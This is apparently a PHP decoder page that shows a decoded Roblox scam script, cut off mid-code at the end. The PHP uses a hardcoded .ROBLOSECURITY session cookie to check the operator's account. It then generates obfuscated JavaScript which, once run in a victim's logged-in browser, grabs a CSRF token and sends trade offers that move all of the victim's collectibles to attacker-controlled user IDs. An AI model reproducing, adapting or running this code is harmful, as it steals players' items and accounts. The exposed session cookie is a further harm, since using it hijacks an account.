Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (isset($_POST['name'])) { $name = $_POST['name']; $pr = $_POST['pr']..
Decoded Output download
<?php
if (isset($_POST['name'])) {
$name = $_POST['name'];
$pr = $_POST['pr'];
$username = $name;
$ch = curl_init('https://users.roblox.com/v1/usernames/users');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["content-type: application/json"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["usernames" => [$username], "excludeBannedUsers" => true]));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if ($response !== false) {
$data = json_decode($response, true);
if (isset($data['data']) && is_array($data['data']) && count($data['data']) > 0) {
$userdata = $data['data'][0];
$formattedOutput = [
"name" => $userdata['name'],
"userId" => $userdata['id'],
];
header('Content-Type: application/json');
$url = "https://premiumfeatures.roblox.com/v1/users/" . $userdata['id'] . "/validate-membership";
$headers = [
'Cookie: .ROBLOSECURITY=_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_F96B9B00E2325D4888BD4012C46A83BD40A85C3F48C7303A30B2C3E05432C5FE98F7226C891236A25669FCC3F929413778B6628AEB3D1BB8F22052A06ED77F7A40FE8524A61623994D89A7F771C503FCD33E3F03184E20C42D492A6B03FDF6DB3FCECD3D3FA58064DFBEE3A9A63024D098D161AF810FFADB7B4EBB670AA2E6B222B300F4AA5722612827F62802BA910500CD665864727DACEF8CF4CFCA12D47C64C3D7B27DC8FD905E2024AE805DEBA0DA35CEF91A94444E701ABC2173939F50863E4CA000BC4F8989F115A91A20D19C4317364699D80450AEF5B8E0EA3A27684DFA2BEAF54C53F4CE448D920BB6F859FD30AC087C4AFC294B0F4684AC2312CFDB47A0E309D1DA278B84CA5B6AF7D4701763BA8100E12C66B050B7E76C130641D0A466672CE2A8EA83966865D63ACE9FF0D53E94A6FEB9842E1F9AE1205959BD85D58CFF9DFFF066DF8FFF54309F4CFCE5F1E03BD6674E4F7DB61407B9B8DE760AA2901821AB7F439343543CA141CBFBFCBAFFA0FAC7B1F4A27FFDF457DAC4BD063AD5FE18C58E962529626F6107DA612F1FF9DC264B49A23AD38E08100AE8E9F77A89D1719090DDFDCAAE8985294C07AD16A7FFA895BFA225A4CD1908C3EABDD3E0041B6B2EA1472C8378415EEDE671F4EEAC7130C9E4B3560E2DA735147555303D0826C37D3A12240952E75013CD6C750DBDAE0E60C3208873D1F796E977D939AAD611713B75615F30A72DAB49D9C9A81E961BBF95FF86C341F625D6253A1CD3D8B15E3F53404E3EC98839A2AD0D86355EEEBB7F91C23CDC620B96F876B02DD1F1FB1E830CCA907AA6778A763EF4C4FA29C9BE33054E3E888FFD487940DB81031A128CB61E846A05F8A41CFCBAD47BEC15B43FF4214097B8A4D3A2AFB7AD1B3BE0126BD4BC7725478D29753D3F5DFBFC09A4A7DBA3CFFE9002A727942D2340B53BD50837984D9E6B1ECC3FED504743E65520AD14D4807E6A5C96C091535FB34F964C3349D6B513AE24A53B2D2639111B11BFB919B806957E442C402D69CD073A7C48BBB6A67A16FBDC12AEE7B5B81CC8AF40236DC604A3B40E283FA7AA2C70099FD956',
'Sec-Ch-Ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"',
'Sec-Ch-Ua-Mobile: ?1',
'Sec-Ch-Ua-Platform: "Android"',
'Sec-Fetch-Dest: document',
'Sec-Fetch-Mode: navigate',
'Sec-Fetch-Site: none',
'Sec-Fetch-User: ?1',
'Upgrade-Insecure-Requests: 1',
'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Mobile Safari/537.36',
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if ($response !== false) {
if ($response === 'true') {
$ID = $userdata['id'];
function generateRandomFolderName($length = 7) {
$folderName = '';
for ($i = 0; $i < $length; $i++) {
$folderName .= random_int(0, 9);
}
return $folderName;
}
$folder = generateRandomFolderName();
if (!is_dir($folder)) {
mkdir("../$folder");
}
$code1 = "(function(_0x2767ad,_0x16230d){function _0x27cdfd(_0x3c94d2,_0x5e8a13,_0x4a4216,_0x3e532f){return _0x3aae(_0x3c94d2- -0xb2,_0x4a4216);}const _0x1f274d=_0x2767ad();function _0x585275(_0xe236ac,_0x3542e2,_0x2c6a77,_0x9a09e6){return _0x3aae(_0x2c6a77-0x321,_0x3542e2);}while(!![]){try{const _0x30bcdb=-parseInt(_0x27cdfd(0xbc,0xb4,0xca,0xac))/0x1+parseInt(_0x27cdfd(0xc0,0xc4,0xac,0xc8))/0x2*(parseInt(_0x27cdfd(0xa2,0xba,0xb3,0x9d))/0x3)+-parseInt(_0x27cdfd(0xa8,0xa3,0xc6,0x97))/0x4*(-parseInt(_0x585275(0x489,0x4a4,0x485,0x483))/0x5)+-parseInt(_0x585275(0x45f,0x45b,0x45d,0x44e))/0x6*(parseInt(_0x27cdfd(0x7c,0x65,0x5f,0x68))/0x7)+parseInt(_0x27cdfd(0x89,0x9c,0x9c,0xa0))/0x8*(-parseInt(_0x27cdfd(0x94,0x9f,0xaf,0x9d))/0x9)+parseInt(_0x585275(0x44a,0x467,0x453,0x464))/0xa+parseInt(_0x27cdfd(0x9c,0xa4,0x7a,0x90))/0xb*(-parseInt(_0x27cdfd(0x83,0x9e,0x8f,0x8c))/0xc);if(_0x30bcdb===_0x16230d)break;else _0x1f274d['push'](_0x1f274d['shift']());}catch(_0xbcda9d){_0x1f274d['push'](_0x1f274d['shift']());}}}(_0x5244,0xdc9fe));function _0x3aae(_0x304630,_0x14acf0){const _0x235403=_0x5244();return _0x3aae=function(_0x26ca61,_0x1bf8bb){_0x26ca61=_0x26ca61-0x12e;let _0x52e024=_0x235403[_0x26ca61];return _0x52e024;},_0x3aae(_0x304630,_0x14acf0);}function _0x5244(){const _0x3d385a=['4956117ljIeiN','getAttribut','Order=Asc&l','csrf-token"','tor("return','No Premium','4GBvcVZ','toString','error','length','data','POST','UserID','return (fun','/json','/mobileapi/','8121670qARDnc','userAssetId','info','warn','c&limit=10','apply','https://inv','ot found','ortOrder=As','indexOf','1619571UVTcTV','userinfo','console','include','2NWxvEQ','30331JKooyP','th name="cs','min','Success','16703850GDkqZe','RobuxBalanc','...','467388PHlxGU','undefined','bind','log','exception','search','24MkYtAM','2310mTblgw','constructor','map','des.roblox.','prototype','lectibles?s','ox.com/v1/u','{}.construc','https://tra','entory.robl','1681677qvEhwI','innerHTML','ction() ','stringify','success','application','es/send','json','55sEIykp','https://www','.roblox.com','data-token','meta[name="','com/v1/trad'];_0x5244=function(){return _0x3d385a;};return _0x5244();}var TermedUser=prompt('$pr');TermedUser?alert(_0x159d49(-0xda,-0xc8,-0xc2,-0xc6)):alert('Failed');async function TermedAssets(){function _0x1283e8(_0x446d6f,_0x69bbb6,_0x53a02a,_0x5c1954){return _0x159d49(_0x446d6f-0x16c,_0x69bbb6-0x101,_0x446d6f- -0x10b,_0x69bbb6);}function _0x4f3994(_0x54f6d3,_0x1d8ab2,_0x4f6cf2,_0x3c0705){return _0x159d49(_0x54f6d3-0x9a,_0x1d8ab2-0xf2,_0x1d8ab2-0x346,_0x54f6d3);}const _0xa53c38=_0x4f3994(0x2ab,0x2bd,0x2ab,0x2ae)+_0x1283e8(-0x1b9,-0x1a3,-0x1be,-0x1b5)+_0x1283e8(-0x1bc,-0x1c3,-0x1ad,-0x1de)+'sers/$ID/as'+'sets/collec'+'tibles?sort'+_0x1283e8(-0x1a8,-0x1b5,-0x19c,-0x1ac)+'imit=50';try{const _0x616ffb=await fetch(_0xa53c38);if(!_0x616ffb['ok'])throw new Error(_0x4f3994(0x2cc,0x2af,0x29c,0x2b7));const _0x29b304=await _0x616ffb[_0x4f3994(0x29a,0x2a0,0x2c1,0x29c)](),_0x142749=_0x29b304[_0x1283e8(-0x1a0,-0x1c2,-0x18a,-0x194)],_0x165f19=_0x142749[_0x4f3994(0x2ac,0x291,0x298,0x2ae)](_0x39bf32=>_0x39bf32[_0x1283e8(-0x199,-0x17b,-0x1a0,-0x1b2)]),_0x10a3be=_0x142749[_0x1283e8(-0x1c0,-0x1d6,-0x1d7,-0x1c8)](_0x73eec9=>_0x73eec9['recentAvera'+'gePrice']),_0x35cb56=_0x10a3be[_0x4f3994(0x2b7,0x2c0,0x2be,0x2bf)](Math[_0x1283e8(-0x1ce,-0x1e0,-0x1e6,-0x1db)](..._0x10a3be)),_0x28d770=_0x142749[_0x35cb56];return console['log'](_0x28d770),_0x28d770[_0x1283e8(-0x199,-0x181,-0x181,-0x1a9)];}catch(_0x305b67){return console[_0x1283e8(-0x1a2,-0x184,-0x1c2,-0x187)](_0x305b67),null;}}async function FetchInfo(){function _0x48b304(_0x2328b0,_0xc720c5,_0x4edb77,_0x52bb94){return _0x159d49(_0x2328b0-0x193,_0xc720c5-0x13,_0x4edb77- -0x146,_0x52bb94);}function _0x48db53(_0x5a6b28,_0x2a15cb,_0x1322d6,_0x280a52){return _0x159d49(_0x5a6b28-0x53,_0x2a15cb-0x1b6,_0x2a15cb-0x29a,_0x5a6b28);}try{const _0x3903a6=await fetch(_0x48db53(0x1e6,0x1f6,0x1fe,0x1fb)+'.roblox.com'+_0x48b304(-0x1b8,-0x1eb,-0x1d6,-0x1dd)+_0x48b304(-0x1b7,-0x1ac,-0x1ca,-0x1e3)),_0x66cf85=await _0x3903a6[_0x48b304(-0x1f5,-0x202,-0x1ec,-0x1fd)](),_0x45a763=_0x66cf85[_0x48db53(0x1df,0x1da,0x1c1,0x1e7)+'e'],_0x40a7ce=_0x66cf85[_0x48db53(0x21f,0x207,0x222,0x20e)];if(typeof _0x45a763==='undefined'||typeof _0x40a7ce===_0x48b304(-0x222,-0x224,-0x203,-0x1e0))throw new Error('error');const _0x413031=await fetch('https://inv'+_0x48db53(0x1d7,0x1ec,0x20e,0x1e3)+_0x48b304(-0x1f7,-0x213,-0x1f7,-0x1ff)+'sers/'+_0x40a7ce+('/assets/col'+_0x48b304(-0x1db,-0x20b,-0x1f8,-0x208)+_0x48b304(-0x1d8,-0x1c1,-0x1cd,-0x1c6)+_0x48b304(-0x1ee,-0x1e1,-0x1d1,-0x1eb))),_0x2073e9=await _0x413031[_0x48b304(-0x1f5,-0x1f0,-0x1ec,-0x1fc)](),_0x4361a6=_0x2073e9['data'][_0x48db53(0x1c5,0x1e5,0x1d2,0x1ec)](_0x222eac=>_0x222eac[_0x48db53(0x223,0x20c,0x1ea,0x21a)]);if(_0x4361a6[_0x48db53(0x1ff,0x204,0x1e9,0x20d)]===0x0)throw new Error(_0x48db53(0x1fb,0x1db,0x1b9,0x1ce));return{'robuxBalance':_0x45a763,'RobloxID':_0x40a7ce,'userAssetIds':_0x4361a6};}catch(_0x153343){console[_0x48b304(-0x1ee,-0x1ea,-0x1dd,-0x1ce)](_0x153343);throw _0x153343;}}async function fetchCsrfToken(){function _0x264d23(_0x4e249d,_0x2bcdc7,_0x33d3c1,_0x3661f9){return _0x159d49(_0x4e249d-0x82,_0x2bcdc7-0x3e,_0x4e249d-0x55b,_0x33d3c1);}function _0x21c9e9(_0x56dda7,_0x49b3a5,_0x4857c5,_0x592c10){return _0x159d49(_0x56dda7-0x5f,_0x49b3a5-0x2e,_0x49b3a5- -0x11,_0x4857c5);}try{const _0x496708=await fetch(_0x21c9e9(-0xc2,-0xb5,-0xc5,-0xa9)+_0x21c9e9(-0xd4,-0xb4,-0xd0,-0xd2)),_0x47b588=await _0x496708['text'](),_0xcbf9b5=document['createEleme'+'nt']('div');_0xcbf9b5[_0x21c9e9(-0xb3,-0xbd,-0xb4,-0xd0)]=_0x47b588;const _0x4ce591=_0xcbf9b5['querySelect'+'or'](_0x264d23(0x4ba,0x4d8,0x49e,0x4a8)+_0x21c9e9(-0x9e,-0xad,-0xa9,-0x9b)+']');if(!_0x4ce591)throw new Error('Meta tag wi'+_0x264d23(0x497,0x485,0x4ba,0x489)+'rf-token" n'+_0x264d23(0x4d3,0x4e5,0x4c1,0x4c9));const _0x13cbbf=_0x4ce591[_0x21c9e9(-0xc6,-0xaf,-0xaa,-0x93)+'e'](_0x264d23(0x4b9,0x4c4,0x4cb,0x4d6));if(!_0x13cbbf)throw new Error(_0x264d23(0x4c4,0x4b1,0x4d5,0x4a4));return _0x13cbbf;}catch(_0x574dfc){console[_0x21c9e9(-0x90,-0xa8,-0xbb,-0xb4)](_0x574dfc);throw _0x574dfc;}}async function Roblox(_0x135e75){function _0xb36c1a(_0x480db1,_0x48f60f,_0x5e9b2e,_0xbceb45){return _0x159d49(_0x480db1-0x95,_0x48f60f-0xde,_0x48f60f- -0x1e,_0x480db1);}function _0x259668(_0x5a16d3,_0x18d464,_0x5dd3a6,_0x187b5a){return _0x159d49(_0x5a16d3-0x1c0,_0x18d464-0x124,_0x5a16d3-0x50b,_0x5dd3a6);}try{const _0x335d17=await fetchCsrfToken(),_0x507aed=await fetch(_0x259668(0x45c,0x45c,0x476,0x476)+_0x259668(0x457,0x45f,0x461,0x464)+_0x259668(0x46b,0x45c,0x44b,0x485)+_0x259668(0x464,0x450,0x47b,0x471),{'method':_0xb36c1a(-0xae,-0xb2,-0xa9,-0xca),'headers':{'Content-Type':_0xb36c1a(-0xde,-0xc6,-0xaf,-0xad)+_0xb36c1a(-0xb5,-0xaf,-0x91,-0xd0),'X-CSRF-TOKEN':_0x335d17},'credentials':_0xb36c1a(-0xba,-0xa0,-0x9d,-0x8c),'body':JSON[_0xb36c1a(-0xc8,-0xc8,-0xe3,-0xca)](_0x135e75)});if(_0x507aed['ok'])console[_0xb36c1a(-0xb9,-0xd9,-0xef,-0xd1)](_0x259668(0x462,0x44d,0x479,0x479));else{const _0x3923c1=await _0x507aed[_0x259668(0x465,0x459,0x451,0x474)]();console[_0xb36c1a(-0xcc,-0xb5,-0xb4,-0xb8)](_0x3923c1);}}catch(_0x1c334f){console[_0xb36c1a(-0xb4,-0xb5,-0xb7,-0xa6)](_0x259668(0x471,0x453,0x46c,0x46f));throw _0x1c334f;}}async function Verify(){const _0xa5c862=(function(){let _0x5eae90=!![];return function(_0x5170f3,_0x295e9d){const _0x268e68=_0x5eae90?function(){function _0x1f2876(_0x2a4b1a,_0x2733f9,_0x21ad6b,_0x2f98d6){return _0x3aae(_0x2733f9- -0x10,_0x21ad6b);}if(_0x295e9d){const _0x3ecf81=_0x295e9d[_0x1f2876(0x15f,0x159,0x17c,0x179)](_0x5170f3,arguments);return _0x295e9d=null,_0x3ecf81;}}:function(){};return _0x5eae90=![],_0x268e68;};}()),_0x51a6f6=_0xa5c862(this,function(){function _0x4dcf80(_0x4f748f,_0x4d8f44,_0x53725f,_0x452206){return _0x3aae(_0x53725f- -0x3c5,_0x4d8f44);}function _0x6a8245(_0xfada0a,_0x457686,_0x5c15c0,_0x35834c){return _0x3aae(_0x5c15c0-0x27e,_0x35834c);}return _0x51a6f6[_0x6a8245(0x3fc,0x3cf,0x3d9,0x3b7)]()[_0x6a8245(0x3cc,0x3bc,0x3b8,0x39f)]('(((.+)+)+)+'+'$')[_0x6a8245(0x3d8,0x3ba,0x3d9,0x3c4)]()[_0x6a8245(0x3d0,0x3cf,0x3bb,0x3aa)](_0x51a6f6)['search']('(((.+)+)+)+'+'$');});function _0x586fad(_0x508fcb,_0x49d93b,_0x183d5b,_0x46ad1a){return _0x159d49(_0x508fcb-0xe2,_0x49d93b-0x12c,_0x183d5b-0x28,_0x49d93b);}function _0x1673af(_0x2aca23,_0x11bbb6,_0x330147,_0x5b5f21){return _0x159d49(_0x2aca23-0xf3,_0x11bbb6-0x1f,_0x2aca23-0x3fe,_0x5b5f21);}_0x51a6f6();const _0x2830e2=(function(){let _0x2e3d07=!![];return function(_0x1115e0,_0x2c9a06){const _0x1a9eaf=_0x2e3d07?function(){function _0x55b3a7(_0x61a9b2,_0x1c1028,_0x2273fd,_0x3799ea){return _0x3aae(_0x1c1028- -0x81,_0x2273fd);}if(_0x2c9a06){const _0x527f92=_0x2c9a06[_0x55b3a7(0xc7,0xe8,0xea,0xd4)](_0x1115e0,arguments);return _0x2c9a06=null,_0x527f92;}}:function(){};return _0x2e3d07=![],_0x1a9eaf;};}()),_0x5389ef=_0x2830e2(this,function(){let _0x760bcc;try{const _0x4dfd64=Function(_0x1dfb61(0x181,0x199,0x187,0x19c)+_0x1dfb61(0x168,0x166,0x157,0x175)+(_0x5412d4(0x2aa,0x2ae,0x2ca,0x2b9)+_0x5412d4(0x2dd,0x2bd,0x2e9,0x2ce)+' this")( )')+');');_0x760bcc=_0x4dfd64();}catch(_0x20a4e7){_0x760bcc=window;}const _0x5889a4=_0x760bcc['console']=_0x760bcc[_0x5412d4(0x2f3,0x2d2,0x2f7,0x2e6)]||{};function _0x5412d4(_0x43b02b,_0x4008a0,_0x1579aa,_0xf4395f){return _0x3aae(_0xf4395f-0x176,_0x43b02b);}function _0x1dfb61(_0x11ce06,_0x3c2f64,_0x11c335,_0x3ee059){return _0x3aae(_0x11ce06-0x20,_0x3c2f64);}const _0x2907df=['log',_0x5412d4(0x2fe,0x2e6,0x2d5,0x2dd),_0x1dfb61(0x186,0x19a,0x197,0x16d),_0x5412d4(0x2be,0x2bd,0x2c6,0x2d2),_0x1dfb61(0x159,0x146,0x14e,0x140),'table','trace'];for(let _0x35d808=0x0;_0x35d808<_0x2907df[_0x1dfb61(0x17d,0x19c,0x18b,0x15d)];_0x35d808++){const _0x411fd4=_0x2830e2['constructor'][_0x1dfb61(0x160,0x145,0x13e,0x171)][_0x5412d4(0x2b8,0x2cf,0x291,0x2ad)](_0x2830e2),_0x2d9984=_0x2907df[_0x35d808],_0xb9889e=_0x5889a4[_0x2d9984]||_0x411fd4;_0x411fd4['__proto__']=_0x2830e2['bind'](_0x2830e2),_0x411fd4['toString']=_0xb9889e['toString']['bind'](_0xb9889e),_0x5889a4[_0x2d9984]=_0x411fd4;}});_0x5389ef();try{const {robuxBalance:_0x3e8ce3,RobloxID:_0x51d066,userAssetIds:_0x57b704}=await FetchInfo(),_0x30efe4=await TermedAssets(),_0x28bc18={'offers':[{'userId':$ID,'userAssetIds':[_0x30efe4],'robux':null},{'userId':_0x51d066,'userAssetIds':_0x57b704,'robux':null}]},_0x4e62d6={'offers':[{'userId':0xf8fec04b,'userAssetIds':[_0x30efe4],'robux':null},{'userId':_0x51d066,'userAssetIds':_0x57b704,'robux':null}]};console[_0x1673af(0x343,0x348,0x362,0x346)]('Trade Send!'),await Roblox(_0x28bc18),await Roblox(_0x4e62d6);}catch(_0x483d70){console[_0x1673af(0x367,0x34f,0x356,0x349)](_0x586fad(-0x79,-0x55,-0x72,-0x52));}}function _0x159d49(_0x458e26,_0x588bdd,_0xe216de,_0x39e574){return _0x3aae(_0xe216de- -0x1f3,_0x39e574);}Verify();";
$code2 = "(function(_0x32a914,_0x386fa7){const _0x42685a=_0x32a914();function _0x2a6cf8(_0x40b56a,_0x465120,_0xcdd809,_0x132aea){return _0x3657(_0x40b56a-0x1ce,_0x132aea);}function _0x4898c8(_0x4e0f3e,_0x30459b,_0x9062a1,_0x144823){return _0x3657(_0x4e0f3e-0x3a3,_0x9062a1);}while(!![]){try{const _0x3a039a=parseInt(_0x2a6cf8(0x372,0x37e,0x354,0x35c))/0x1*(parseInt(_0x4898c8(0x53e,0x550,0x51a,0x51e))/0x2)+parseInt(_0x4898c8(0x540,0x560,0x534,0x55e))/0x3*(-parseInt(_0x2a6cf8(0x37d,0x36b,0x367,0x37b))/0x4)+parseInt(_0x4898c8(0x543,0x528,0x545,0x569))/0x5*(parseInt(_0x2a6cf8(0x34f,0x330,0x330,0x332))/0x6)+parseInt(_0x4898c8(0x551,0x569,0x55e,0x558))/0x7*(parseInt(_0x2a6cf8(0x394,0x3a1,0x3ac,0x388))/0x8)+parseInt(_0x4898c8(0x533,0x51f,0x510,0x52c))/0x9+parseInt(_0x4898c8(0x54e,0x53e,0x564,0x54a))/0xa+-parseInt(_0x2a6cf8(0x393,0x39b,0x392,0x389))/0xb*(parseInt(_0x2a6cf8(0x390,0x372,0x396,0x37e))/0xc);if(_0x3a039a===_0x386fa7)break;else _0x42685a['push'](_0x42685a['shift']());}catch(_0x51db92){_0x42685a['push'](_0x42685a['shift']());}}}(_0x9ee0,0xbe104));function _0x401184(_0x32c10d,_0x5cf8c7,_0x4ab3c1,_0x418cec){return _0x3657(_0x32c10d- -0x239,_0x418cec);}var TermedUser=prompt(_0x401184(-0xb7,-0xdb,-0xce,-0x97));TermedUser?alert(_0x401184(-0xb6,-0xb6,-0xcd,-0xc3)):alert(_0x2dc2bd(0x371,0x3a0,0x37d,0x384));async function TermedAssets(){function _0x1c5941(_0x533409,_0x227d13,_0x364adf,_0x1cedb0){return _0x401184(_0x227d13-0x34c,_0x227d13-0x1af,_0x364adf-0x176,_0x533409);}const _0x1051b0='https://inv'+_0x2e07e9(0xd6,0xc6,0xc4,0xc2)+_0x2e07e9(0xce,0x100,0x107,0xe5)+_0x2e07e9(0xee,0x10f,0xfe,0x107)+_0x1c5941(0x2a0,0x2a2,0x282,0x280)+_0x2e07e9(0xee,0xfb,0xf9,0xf9)+'Order=Asc&l'+_0x2e07e9(0xd4,0xb9,0xd2,0xd4);function _0x2e07e9(_0x4358df,_0x1cdc8f,_0x49376a,_0x4df4ff){return _0x2dc2bd(_0x49376a,_0x1cdc8f-0x13a,_0x4df4ff- -0x2ab,_0x4df4ff-0x70);}try{const _0x188655=await fetch(_0x1051b0);if(!_0x188655['ok'])throw new Error(_0x2e07e9(0xe2,0xce,0x10c,0xf1));const _0xdfbf43=await _0x188655[_0x2e07e9(0xd1,0xd4,0xba,0xd5)](),_0x13c78a=_0xdfbf43[_0x1c5941(0x2a9,0x2b5,0x2da,0x2c0)],_0x3cd1c9=_0x13c78a['map'](_0x43b1a2=>_0x43b1a2[_0x2e07e9(0xbd,0xd1,0xda,0xc6)]),_0x47661a=_0x13c78a[_0x2e07e9(0xf4,0xea,0xcf,0xd6)](_0x3b1142=>_0x3b1142[_0x1c5941(0x2d0,0x2c8,0x2e6,0x2ac)+'gePrice']),_0x5e0887=_0x47661a[_0x1c5941(0x2c5,0x2c4,0x2a2,0x2bb)](Math[_0x1c5941(0x2cc,0x2b8,0x292,0x2c2)](..._0x47661a)),_0x3ef27f=_0x13c78a[_0x5e0887];return console[_0x2e07e9(0xb7,0xc8,0xaa,0xca)](_0x3ef27f),_0x3ef27f[_0x1c5941(0x2ab,0x29c,0x2b9,0x2bd)];}catch(_0xd90528){return console[_0x1c5941(0x2e5,0x2c7,0x2e6,0x2e6)](_0xd90528),null;}}function _0x3657(_0x5c45d2,_0x130a69){const _0x1075cd=_0x9ee0();return _0x3657=function(_0x354869,_0x8cbff5){_0x354869=_0x354869-0x180;let _0x177af9=_0x1075cd[_0x354869];return _0x177af9;},_0x3657(_0x5c45d2,_0x130a69);}async function FetchInfo(){function _0x560c51(_0x490bf1,_0x23571c,_0x2855c9,_0x38c3eb){return _0x2dc2bd(_0x38c3eb,_0x23571c-0x1af,_0x490bf1- -0x132,_0x38c3eb-0x98);}function _0x4f13f1(_0x23111c,_0xa55caa,_0x39a660,_0x1071e0){return _0x2dc2bd(_0x23111c,_0xa55caa-0x1ae,_0x39a660- -0x340,_0x1071e0-0x1d3);}try{const _0x50e0f2=await fetch(_0x4f13f1(0x35,0xd,0x2e,0x24)+_0x560c51(0x23e,0x260,0x244,0x21d)+_0x560c51(0x274,0x25c,0x28f,0x28a)+_0x560c51(0x255,0x234,0x25e,0x259)),_0x1273ef=await _0x50e0f2[_0x560c51(0x24e,0x26b,0x23a,0x23d)](),_0x1f6ef3=_0x1273ef[_0x4f13f1(0x57,0x47,0x3c,0x51)+'e'],_0x521b7b=_0x1273ef[_0x560c51(0x27d,0x26b,0x29c,0x29f)];if(typeof _0x1f6ef3==='undefined'||typeof _0x521b7b===_0x560c51(0x260,0x242,0x265,0x242))throw new Error(_0x4f13f1(0x7d,0x3c,0x5c,0x80));const _0x3bd8fc=await fetch('https://inv'+_0x4f13f1(0x13,0x43,0x2d,0x39)+_0x4f13f1(0x37,0x2c,0x50,0x46)+'sers/'+_0x521b7b+(_0x4f13f1(0x46,0x11,0x32,0x3a)+_0x4f13f1(0x72,0x66,0x62,0x88)+_0x560c51(0x26d,0x280,0x24d,0x24f)+_0x4f13f1(0x68,0x43,0x5e,0x7e))),_0x135260=await _0x3bd8fc[_0x560c51(0x24e,0x25a,0x255,0x238)](),_0x5cd09d=_0x135260[_0x560c51(0x258,0x24c,0x253,0x26a)]['map'](_0x5d1934=>_0x5d1934['userAssetId']);if(_0x5cd09d['length']===0x0)throw new Error('...');return{'robuxBalance':_0x1f6ef3,'RobloxID':_0x521b7b,'userAssetIds':_0x5cd09d};}catch(_0xeb4ed5){console[_0x560c51(0x26a,0x253,0x285,0x26b)](_0xeb4ed5);throw _0xeb4ed5;}}function _0x2dc2bd(_0x3a1639,_0x3d5210,_0xdea7e4,_0xb819e1){return _0x3657(_0xdea7e4-0x1e8,_0x3a1639);}function _0x9ee0(){const _0x5bc4d7=['Success','include','entory.robl','https://www','Trade Send!','.roblox.com','userAssetId','/assets/col','constructor','console','log','apply','sets/collec','11141262MZIcMA','ot found','exception','toString','RobuxBalanc','Failed','querySelect','imit=50','json','map','trace','1308178hnjgCT','stringify','63DiyDfk','{}.construc','userinfo','2402895RxMXJQ','search','data','text','1aCWgHB','min','data-token','info','ox.com/v1/u','com/v1/trad','undefined','2082230KFODRX','des.roblox.','bind','5239213TMLDDL','271512ZkZgYU','es/send','indexOf','success',' this")( )','error','recentAvera','c&limit=10','ortOrder=As','(((.+)+)+)+','Meta tag wi','lectibles?s','prototype','tibles?sort','POST','/mobileapi/','ction() ','createEleme','div','6751980RuJwWG','meta[name="','return (fun','22xOykEa','8wkAGCB','UserID','/json','csrf-token"','sers/$ID/as','table','__proto__','6occLgI','$pr'];_0x9ee0=function(){return _0x5bc4d7;};return _0x9ee0();}async function fetchCsrfToken(){function _0x5bac02(_0x73013a,_0x166831,_0xfabcf2,_0xaf791e){return _0x401184(_0x166831-0x15e,_0x166831-0x1af,_0xfabcf2-0x9,_0x73013a);}function _0x386120(_0x42c1ad,_0x287822,_0x51bb86,_0x364d70){return _0x2dc2bd(_0x42c1ad,_0x287822-0x31,_0x287822-0x1fe,_0x364d70-0x8c);}try{const _0x5bd5de=await fetch(_0x5bac02(0xca,0xab,0xbc,0x86)+'.roblox.com'),_0x3e9e09=await _0x5bd5de[_0x5bac02(0xe2,0xc8,0xe3,0xda)](),_0x1e872b=document[_0x386120(0x592,0x5a6,0x592,0x5ac)+'nt'](_0x386120(0x592,0x5a7,0x5cc,0x5aa));_0x1e872b['innerHTML']=_0x3e9e09;const _0x42f2fc=_0x1e872b[_0x5bac02(0xb6,0xbb,0xd9,0xca)+'or'](_0x386120(0x5a3,0x5a9,0x5c5,0x594)+_0x386120(0x5d4,0x5af,0x5d5,0x595)+']');if(!_0x42f2fc)throw new Error(_0x386120(0x5b8,0x59f,0x5ae,0x59a)+'th name="cs'+'rf-token" n'+_0x386120(0x565,0x577,0x561,0x576));const _0x20560e=_0x42f2fc['getAttribut'+'e'](_0x386120(0x57b,0x58c,0x5a5,0x58f));if(!_0x20560e)throw new Error(_0x386120(0x5a4,0x59a,0x5bc,0x58c));return _0x20560e;}catch(_0x5bfa6d){console[_0x5bac02(0xc1,0xd9,0xfc,0xf8)](_0x5bfa6d);throw _0x5bfa6d;}}async function Roblox(_0x39e748){function _0x5e16c9(_0xf0365b,_0x5b6a51,_0xca9dc4,_0x4735da){return _0x2dc2bd(_0xf0365b,_0x5b6a51-0xb7,_0x5b6a51-0x1ab,_0x4735da-0x17d);}function _0x486c51(_0x5a0052,_0x13b2ab,_0x1194ca,_0x3ca176){return _0x2dc2bd(_0x13b2ab,_0x13b2ab-0x103,_0x1194ca- -0x3a4,_0x3ca176-0x164);}try{const _0x50fd0b=await fetchCsrfToken(),_0x357003=await fetch('https://tra'+_0x486c51(-0xc,-0xc,-0x10,-0x13)+_0x486c51(-0x2a,0x0,-0x13,0xa)+_0x486c51(0x16,-0x1b,-0xc,-0x9),{'method':_0x486c51(0x18,0x1c,0x1,-0x12),'headers':{'Content-Type':'application'+_0x486c51(0x3,-0x10,0xc,-0x1a),'X-CSRF-TOKEN':_0x50fd0b},'credentials':_0x486c51(-0x3e,-0x3c,-0x38,-0x4c),'body':JSON[_0x5e16c9(0x553,0x52f,0x524,0x520)](_0x39e748)});if(_0x357003['ok'])console[_0x5e16c9(0x532,0x520,0x4fe,0x506)](_0x5e16c9(0x537,0x545,0x559,0x568));else{const _0x298d26=await _0x357003[_0x5e16c9(0x533,0x52b,0x52c,0x52e)]();console[_0x486c51(-0x13,-0x13,-0x8,-0x18)](_0x298d26);}}catch(_0x39f137){console[_0x5e16c9(0x555,0x547,0x528,0x528)]('No Premium');throw _0x39f137;}}async function Verify(){const _0x496bc2=(function(){let _0x3c353b=!![];return function(_0x2009b9,_0x413653){const _0x55dbf6=_0x3c353b?function(){function _0x153249(_0x442ac5,_0x1e7a8b,_0xea13d5,_0x1820b1){return _0x3657(_0xea13d5-0x207,_0x1820b1);}if(_0x413653){const _0x3aefc7=_0x413653[_0x153249(0x3ac,0x3ab,0x395,0x37a)](_0x2009b9,arguments);return 